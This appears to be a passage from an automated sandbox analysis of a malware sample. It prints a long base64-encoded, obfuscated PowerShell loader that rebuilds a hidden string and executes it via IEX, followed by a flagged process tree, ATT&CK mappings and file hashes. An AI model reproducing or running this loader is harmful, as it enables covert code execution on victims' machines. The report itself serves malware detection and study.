4AZgBvAHUAQwBhAHAAaQB0AGkAUwB1AG4AZABoAG4ARwBhAHMAdQBuAHQAUwBwAGUAYwBpACAAQgBsAG8AZAB0AHYAUABoAGEAbABhADEAVABlAHIAcgBhACwARwByAHUAbgBkAGkASwB1AG4AZABlAG4AQwBoAHIAbwBuAHQAUgBlAHQAcgB0ACAAcwB1AGwAcABoAHYAdgBlAGwAbABlADIAdQB0AG4AawBlACkAUgBlAHYAYQBuADsACgBiAGUAYQB1AHAAfQAKAFMAdABpAGwAZQAiAE0AYQBuAHQAaQBAAAoAVQBjAGgAZQBlACQARgByAGEAbQBtAE8ARgByAGUAZABuAHYAUABvAHIAdABvAGUATABpAHIAawBhAHIARwBsAGEAbgBkADMAdgBlAG4AZQByAD0AVABhAHAAaQBzAFsARgByAGUAbQBzAE8AUgB5AHQAdABlAHYAUgBpAHYAbgBpAGUAUABzAHkAYwBoAHIATABhAHUAcgBpADEARABpAHMAYwBlAF0AbQBhAGQAbwBsADoAUgBpAGcAcwBiADoAUwBwAHIAbwBnAFYAYgBpAGEAdABvAGkAQQBkAG8AcAB0AHIAUAByAGUAYwBvAHQAUgBlAG4AbwB2AHUAVABuAGQAYgBhAGEAVgBhAG4AZABiAGwARwBlAG4AcwBrAEEAVQBnAHUAbgBzAGwAUgByAGcAcwBtAGwAQgBlAHMAdAB5AG8AUwBpAG4AdQBhAGMAQgBlAGMAbwBtACgARABvAGcAbQBlADAAUwBrAHUAbQBtACwAUgBlAGcAaQBzADEATgBvAG4AYwBoADAAVwBhAHUAYwBoADQATQBhAGcAaQBjADgAUABlAHQAcgBvADUAVABpAGwAbABpADcAUgBpAG4AZwByADYARQBuAHMAaQBkACwAQQBkAG8AcgBhADEAQgBhAHMAcgBlADIAUgBzAG8AbgBuADIAQgB1AG4AZABmADgASgBlAHIAZQBtADgAUwB0AHkAbABvACwATABuAGkAbgBkADYAdQB0AGkAcwBtADQAVgBhAGwAdQB0ACkACgBQAGUAbgB0AGEAJABCAGUAawBsAGEAVABPAG4AZQBzAHQAZQBFAHgAcABsAG8AcwBPAGIAagBlAGsAdABFAHMAYwBvAGMAYQBGAG8AcgBkAGUAYwBGAG8AcgBzAGEAeQBCAGkAdAB0AGUAcABEAGUAcwB0AGkAbwBJAG0AcABsAGUAZABCAHIAZQBkAGIAPQBXAGkAbgBkAGkAKABQAHIAbwB2AG8ARwBBAHMAdAByAG8AZQBOAG8AbgBpAHIAdABEAHUAYgBsAGUALQBCAGUAcwBsAGEASQBCAGUAcAByAGEAdABIAGUAbQBtAGUAZQBaAGEAbgB6AGkAbQBFAG4AZwBhAG4AUABIAGEAbQBhAHQAcgBMAHkAbQBwAGgAbwBSAGgAZQBpAG4AcABmAG8AcgBnAHIAZQBIAHkAcABlAHIAcgBUAHIAYQB2AGUAdABTAHQAYQBrAGwAeQBPAHAAdABhAGcAIABSAGEAYQBzAHkALQBTAGoAbABzAHMAUABXAGgAaQB0AGUAYQBPAHAAZwBhAHYAdABPAHQAbwBsAG8AaABTAGEAawBrAGEAIABFAHgAcABpAGEAIgBBAHAAcgBpAG8ASABBAGsAawB2AGkASwBFAGwAbABlAHIAQwBTAGsAcgBpAHYAVQBGAG8AcgBlAG0AOgBWAG8AbQBtAGUAXABVAG4AYwBlAGEAUwBQAGwAdQByAGEAbwBBAGQAZQBuAG8AZgBMAG8AdwBlAHIAdABSAGUAagBuAGUAdwBDAGUAbgB0AHIAYQBGAGUAcgBsAHkAcgBTAHQAYQBkAHMAZQBGAHIAdQBnAHQAXABGAHIAcwB0AGUARABUAGUAbgBkAHIAZABTAHkAcwB0AGUAcwBLAGwAYQBwAGgAbwBUAGEAawBuAGkAZgBVAGQAZABhAG4AZgBQAGUAbgBkAGEAZQBNAGUAcwBvAGcAcgBTAHAAeQB0AGsAIgBzAHQAbwByAHQAKQBVAG4AZQBuAGcALgBNAGEAbABhAGMAVABFAGMAdQB2AGUAaAB2AGkAegBhAHIAaQBEAHkAcgBlAGgAcgBLAGEAYgB5AHMAZABPAHYAZQByAHMAbABNAGEAdABlAG0AaQBMAGkAcwB0AGUAbgAKAE4AcgBlAG4AZAAkAFIAaQBnAHMAZABVAE0AaQBuAHUAdABuAGMAcgBhAHcAZABhAEEAZgBzAGwAYQBiAEoAYQBlAHYAbgBqAFAAcgBqAHMAZQB1AEEAawB0AGkAZQByAEoAbwByAGQAZgAgAEMAbwBuAHQAZQA9AEEAZgBnAGEAbgAgAFMAYwBpAHMAcwBbAEEAbAB2AG8AcgBTAFIAZQBuAGUAdwB5AFkAbgBnAHMAdABzAEUAdAB0AGUAcgB0AEsAbABpAHAAcABlAEwAZwBlAGEAdABtAFQAYQBhAHIAZQAuAEYAbwByAGsAbwBDAEYAbwByAGgAYQBvAEIAYQBsAHQAegBuAEQAZQBoAHkAZAB2AFIAbwBkAGwAcwBlAEMAcgBvAHQAYQByAFMAdQByAG0AdQB0AEYAZQBqAGwAawBdAFUAbgBkAGUAcgA6AGYAbwByAG0AYQA6AGYAcgBpAG0AaQBGAFAAcwB5AGMAaAByAEwAYQByAHkAbgBvAFMAbwBmAGYAaQBtAEEAbgB0AGkAcQBCAFMAbABhAGcAdABhAFIAZQBrAG8AcgBzAFYAYQBjAGEAbgBlAFMAbwBmAGEAZwA2AFAAdQBuAGcAZQA0AEIAZQByAGUAZABTAEcAdQBsAHIAYQB0AHMAdABvAHIAawByAFMAawBpAHAAawBpAFMAdAB1AHQAdABuAEQAZQBjAGUAbgBnAGEAdQB0AG8AcAAoAFMAcABpAHIAYQAkAE8AbwBsAG8AZwBUAEIAeQBnAGIAYQBlAFMAdAB5AHIAdABzAHAAaABvAHQAbwB0AE8AcABrAGwAYgBhAFYAcwBrAGUAZABjAE4AeQBtAGEAYQB5AFYAYQBhAGQAcwBwAFQAcgBpAG4AZABvAFMAaQBtAHAAbABkAEQAZQBwAGwAbwApAAoAVQBwAHcAYQByAFsAUgBpAGQAZABlAFMAQgBsAGEAYwBrAHkATgBhAHQAdQByAHMAQgB1AHMAdABoAHQARABpAHAAcwBvAGUATgBlAHQAdABlAG0AVgB1AHIAZABlAC4AQgBvAG4AZABlAFIAZwBsAGkAcwBzAHUAVAByAG8AYwBoAG4ASwBhAGEAbAByAHQAQgBhAG4AagBvAGkAUgBlAGYAbwByAG0ASQBuAGQAdQBjAGUAVABvAHUAcgBpAC4ARgBvAHIAZwBlAEkAVQBuAGQAZQByAG4AUwB0AHIAYQBuAHQAawBsAGkAbgBnAGUAagB1AHYAZQBsAHIAQgBlAGcAdQBuAG8AUgBlAHYAYQBsAHAATABlAHQAaABlAFMASQBuAGQAawBhAGUAVAByAGEAdgBlAHIAVABvAGwAZABrAHYAcgBlAHAAZQByAGkAbwByAGQAawBuAGMAUwBhAHQAYwBoAGUAUwBwAGkAbAB2AHMASwBsAGkAbQBhAC4ATgBvAHAAcgBlAE0ASwByAHkAZABzAGEATABpAGcAZQBmAHIATQBhAHMAcwBlAHMASABhAGEAbgBkAGgAQQByAG0AYQBnAGEAYQBuAG8AZABpAGwAYwBvAHAAeQByAF0AUAByAGUAcgBlADoASABvAHYAbQBvADoATABzAGUAaABhAEMAQgBlAHMAdwBhAG8AVQBuAGgAZQBsAHAASQBsAHMAZQBiAHkAZgBsAG8AcwBzACgARgBqAGUAbgBkACQAQQBpAHoAbwBhAFUAUgB2AHIAZABpAG4ASABhAG4AZABnAGEAYQBkAHYAbwBrAGIAVQBsAHQAcgBhAGoASwByAGEAcABzAHUAVgBlAHIAdABlAHIAbABvAHkAYQBsACwAVgBlAGoAZgBhACAAUABsAHMAZQBkADAAYwBvAG0AbQB1ACwAUwB0AGEAbABkACAAQQBsAGwAbwB0ACAAUABpAG4AZABlACQASQBuAG8AcgBkAE8ASQBtAGEAbQBhAHYASQBuAGYAbwByAGUAUwBtAGEAYQBkAHIAVQBkAHMAawBpADMAUgB1AHMAcwBpACwASQBuAGYAZQByACAATQBhAGwAdgBpACQAcABsAGkAZwB0AFUAUgBlAGEAawB0AG4AUwB0AHkAcgBlAGEAVABhAHAAZQB0AGIASABhAHUAcwBmAGoARgBvAHIAbABkAHUAVQBuAGkAbgBmAHIARgBvAHIAdABqAC4AUwBrAGkAbQBtAGMARABlAHQAYQBpAG8AVwBlAGIAbABzAHUASwBvAG0AcABsAG4ARgB1AG0AZQB3AHQATgB2AG4AZQBuACkAQwBvAHQAcwBlADsACgBTAG0AYQBhAGIAWwBJAG4AdQByAG4ATwBWAGEAZwB0AHAAdgBDAGgAYQBpAG4AZQBVAHIAYQBuAGIAcgBGAG8AcgBlAG4AMQBQAGEAYwBlAGQAXQBBAHIAaQBuAGUAOgBTAGsAdgBhAHQAOgBiAGkAcwBtAGEARQBJAGQAZQBvAGcAbgBzAGUAcgBhAGkAdQBwAGwAYQBuAG8AbQBGAG8AcgBtAGkAUwBSAGUAYQBzAHMAeQBVAG4AZAB1AGIAcwBHAHIAZABhAGcAdABVAG4AdABhAHIAZQBCAHIAaQBrAHYAbQBDAHkAcwB0AG8ATABQAHUAbgBrAGUAbwBjAGkAYwBhAHQAYwBDAGgAbwByAGkAYQBPAGIAbABpAHEAbABTAGMAaABhAHQAZQBBAHAAcABlAGEAcwBDAG8AbgBjAGkAQQBQAGgAbwByAHIAKABQAG8AaQBuAHQAJABHAGUAbQBtAG8ATwBUAGUAdgBhAG4AdgBKAG8AcgBkAGIAZQBBAGkAcgB0AGkAcgB0AGUAcgBuAGEAMwBMAGUAZABzAGEALABpAG4AZQBsAGEAIABTAHQAZQBkAG0AMABGAHUAZwB0AGQAKQBQAHIAaQBtAHQAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABHAGEAcwBsAGkAZwBoAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAQgBlAG0AdQBzAGsAIAA9ACAAJABCAGUAbQB1AHMAawAgACsAIAAkAEcAYQBzAGwAaQBnAGgALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABHAGEAcwBsAGkAZwBoAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAEIAZQBtAHUAcwBrACAAPQAgACQAQgBlAG0AdQBzAGsAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABCAGUAbQB1AHMAawANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4684
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kg30ekjz\kg30ekjz.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3348
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4258.tmp" "c:\Users\Admin\AppData\Local\Temp\kg30ekjz\CSC5AA31E89388542DD92C60A5CCEBC32E.TMP"
      4⤵
      PID:1768

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES4258.tmp

Filesize
1KB

MD5
85913aa43c01a4c2e8d2e98cd3e792fc

SHA1
54c8bb21e86ae1ba1d85c86c36d5a8ea5325872e

SHA256
1917369761709faab13da0c3ec753cc048cba437efca55b346447c439e90a0ec

SHA512
478d73d07faf8b389c35a5ea0d2d22fb64592b8254c3a54a8564464da21cba62cef0e17dafd1f5907a2501dd60eb2969ccae48f35e635209584977e7ab6c04cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\kg30ekjz\kg30ekjz.dll

Filesize
3KB

MD5
3171af9ff07e90806fd985344f369408

SHA1
93d72b61cf67b87252442d61db35905eb967ed07

SHA256
9e14d8e030b0e0fbc61f9f24b25af3d63bc64b46734ce57835e8dde45aaea25c

SHA512
77c2a3cfb7fc2c43c9b95ce9fa93c8041b1311aa440401fd32bd20564322b18f993fd5eb55ab3ac261a647c1849f8ef19164c8aa2d52a8bed2b300742e812b89

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kg30ekjz\CSC5AA31E89388542DD92C60A5CCEBC32E.TMP

Filesize
652B

MD5
8f7d366d0df78addbe7f7d746db1dc4f

SHA1
53726f7e5988e5f1af5f8f5b60b0ef9a9194368c

SHA256
f0a62cdaebce4853cb5b36df1625d624852e1195f95651ace699f9a1e9fe02e4

SHA512
d64f85bc6fae8f2e7d5ccad825528ed893b7b5cd044ccd228df8b3e6cdeca1c150cdff70ef113b952122e1f16d9ee049ce1496cbbd5e41d84d37ad5cdb488eea

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kg30ekjz\kg30ekjz.0.cs

Filesize
910B

MD5
8bc6902c9554f8e17fdb227670053f69

SHA1
36bf150cb69b52688beec1483a5b0f32f7709c46

SHA256
73d4b18caad7ad9e4bd8957be138ee440008c3a27859a025136525102e9f8114

SHA512
9f8da240977b055655e7f7ed2dbd11a28bffde0799761c2e51d3473f0ee0c93510ee11e68d130b0b5b9341ec7ef0a3f62b75eeb76891491c7fb56d0b6ba37027

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kg30ekjz\kg30ekjz.cmdline

Filesize
369B

MD5
4d870941dc60cb70247872492b9e16df

SHA1
23adf65c01c87c51e3734522b371b890fbb12612

SHA256
07e8e510d3ba457c5f16b7aace77343588d5e676b80bb22f84d170062f602bef

SHA512
077aab61832d35e4d0953ffc2aeefd002036336b092ae7f945d9c48c996782893fd4b3204800da9c641d0bb81428f026f7f1d798d3e8fac7d95a904c5c504743

Download Submit
memory/4684-135-0x0000000005860000-0x0000000005882000-memory.dmp

Filesize
136KB

Download
memory/4684-134-0x0000000005A60000-0x0000000006088000-memory.dmp

Filesize
6.2MB

Download
memory/4684-139-0x0000000008090000-0x000000000870A000-memory.dmp

Filesize
6.5MB

Download
memory/4684-136-0x0000000005900000-0x0000000005966000-memory.dmp

Filesize
408KB

Download
memory/4684-138-0x0000000006730000-0x000000000674E000-memory.dmp

Filesize
120KB

Download
memory/4684-137-0x0000000005970000-0x00000000059D6000-memory.dmp

Filesize
408KB

Download
memory/4684-140-0x0000000007840000-0x000000000785A000-memory.dmp

Filesize
104KB

Download
memory/4684-133-0x00000000052B0000-0x00000000052E6000-memory.dmp

Filesize
216KB

Download
memory/4684-148-0x0000000007AF0000-0x0000000007B86000-memory.dmp

Filesize
600KB

Download
memory/4684-149-0x00000000079D0000-0x00000000079F2000-memory.dmp

Filesize
136KB

Download
memory/4684-150-0x0000000008CC0000-0x0000000009264000-memory.dmp

Filesize
5.6MB

Download
memory/4684-151-0x00000000078D0000-0x00000000079D0000-memory.dmp

Filesize
1024KB

Download
memory/4684-152-0x00000000078D0000-0x00000000079D0000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing